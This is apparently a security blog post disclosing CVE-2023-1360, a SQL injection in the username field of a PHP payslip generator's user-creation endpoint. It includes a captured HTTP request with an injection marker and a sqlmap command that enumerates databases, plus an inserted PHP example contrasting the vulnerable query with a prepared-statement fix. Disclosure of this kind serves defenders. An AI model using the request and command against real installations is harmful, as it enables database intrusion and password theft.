CVE-2023-1360: SQL Injection in Employee Payslip Generator System 1.2.0 – 0xgabe Blog
A vulnerability was found in SourceCodester Employee Payslip Generator with Sending Mail 1.2.0 and classified as critical. This issue affects some unknown processing of the file classes/Users.php?f=save of the component New User Creation. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-222863.
What is Employee Payslip Generator System?
The Employee Payslip Generator System is a PHP Project. The system was developed for a particular company and allows the management to easily calculate the company’s employee payroll and generate a PDF payslip. It has a feature to send the generated payslip to their employees’ email. The generated payslip is encrypted and the password will be provided only to employees. To learn more about the system, visit the Employees Pay Slip PDF Generator System with Email using the PHP/OOP Free Source Code article on this site.
Software vendor: https://www.sourcecodester.com/php/16264/updated-employee-payslip-generator-sending-mail-using-php-and-gmail-smtp.html
Impact
An attacker authenticated as an administrator can inject SQL commands when creating new users, which may lead to password leaks.
The vulnerability
It was possible to inject SQL commands at least at one point in the application, more specifically in the username parameter. The following image demonstrates the error message displayed when entering a single quote:
Looking at the source code of the application, more specifically at the “Users.php” file, we can see that on line 25 a database query is performed, passing the value directly, without any filter.
The following image illustrates the fact:
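As an added illustration (not the project's own code; the actual Users.php query is not reproduced here), the following PHP contrasts the string-built INSERT pattern the post describes with a mysqli prepared statement. The table and column names, the password hashing and the username policy are assumptions.

```php
<?php
// Added example, not code from the Employee Payslip Generator project.
// Table/column names (users, username, password, type) are assumptions.

// Vulnerable pattern: the username value is interpolated straight into the SQL
// text, so a single quote in the input changes the statement's structure and
// the driver error surfaces to the client (the behaviour the post observes).
function save_user_vulnerable(mysqli $db, array $post): bool
{
    $username = $post['username'];
    $hash     = password_hash($post['password'], PASSWORD_DEFAULT);
    $type     = (int) $post['type'];
    $sql = "INSERT INTO users (username, password, type) "
         . "VALUES ('{$username}', '{$hash}', {$type})";
    return $db->query($sql) !== false;
}

// Hardened pattern: the SQL text is fixed and every value is bound as data,
// so quotes or keywords in the username can never alter the statement.
function save_user_safe(mysqli $db, array $post): bool
{
    $username = $post['username'] ?? '';
    // Reject usernames outside an explicit policy before touching the database.
    if (!preg_match('/^[A-Za-z0-9._-]{3,32}$/', $username)) {
        return false;
    }
    $hash = password_hash($post['password'] ?? '', PASSWORD_DEFAULT);
    $type = (int) ($post['type'] ?? 0);

    $stmt = $db->prepare(
        "INSERT INTO users (username, password, type) VALUES (?, ?, ?)"
    );
    if ($stmt === false) {
        // Log $db->error server-side; never echo driver errors to the browser,
        // since a verbose SQL error is what confirms the injection to a tester.
        return false;
    }
    $stmt->bind_param('ssi', $username, $hash, $type);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}
```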
It was possible to exploit the vulnerability using the Boolean-based blind technique. To speed up the exploitation process, use the following request together with the SQLMap tool.
POST /php-pess/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 771
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAaG6PbmNS0LS6zmB
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=6d2i5btkbanj3dkr5a127ctsfs
Connection: close
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="id"
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="firstname"
User
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="lastname"
guest
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="username"
*
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="password"
random
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="type"
1
------WebKitFormBoundaryAaG6PbmNS0LS6zmB
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryAaG6PbmNS0LS6zmB--
Now run SQLMap with the following command: it reads the saved request above, restricts testing to the Boolean-based blind technique and finally enumerates the databases.
python3 sqlmap.py -r file.txt --technique="B" --dbs
As a result, the databases are enumerated. The following image demonstrates this: